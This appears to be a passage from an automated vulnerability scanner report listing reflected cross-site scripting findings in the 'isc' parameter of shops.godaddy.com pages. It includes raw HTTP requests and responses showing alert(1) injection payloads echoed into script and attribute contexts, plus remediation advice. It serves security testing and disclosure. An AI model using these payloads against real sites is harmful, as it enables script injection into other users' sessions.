P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=ge3fcjaiic3reiiglzahmw45; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Fri, 19-Nov-2010 23:16:15 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Tue, 14-Dec-2010 23:16:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:16:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
<div style="width:222px;height:55px;" onclick="pcj_lnk('http://www.godaddy.com/default.aspx?isc=GPPT02C0211ad87"style="x:expression(alert(1))"ef69d8537c&ci=13333'); return false;" title="GoDaddy.com">
...[SNIP]...

3.216. http://shops.godaddy.com/Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/ [isc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/

Issue detail

The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0893"%3balert(1)//bec5869f8e5 was submitted in the isc parameter. This input was echoed as a0893";alert(1)//bec5869f8e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/?isc=GPPT02C021a0893"%3balert(1)//bec5869f8e5&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 167989
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=h0f2ar45fmu15k45r2cwyx2i; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Fri, 19-Nov-2010 23:16:31 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Tue, 14-Dec-2010 23:16:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:16:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
rl_mya="https://mya.godaddy.com/";
var pcj_url_img="http://img5.wsimg.com/";
var pcj_url_cmnty="http://community.godaddy.com/";
var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C021a0893";alert(1)//bec5869f8e5&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005";
var pcj_isMgr = false;
var pcj_idpredirect = "";
var pcj_ssoTargetKey = "target";
var pcj_isCart = false;
var pcj_isCmnty = false;
var pcj_cname = "ShopperId1
...[SNIP]...

3.217. http://shops.godaddy.com/Preferred-Merchandizing/Litter-Lifter-Magic-Scoop/ [isc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path: &nbs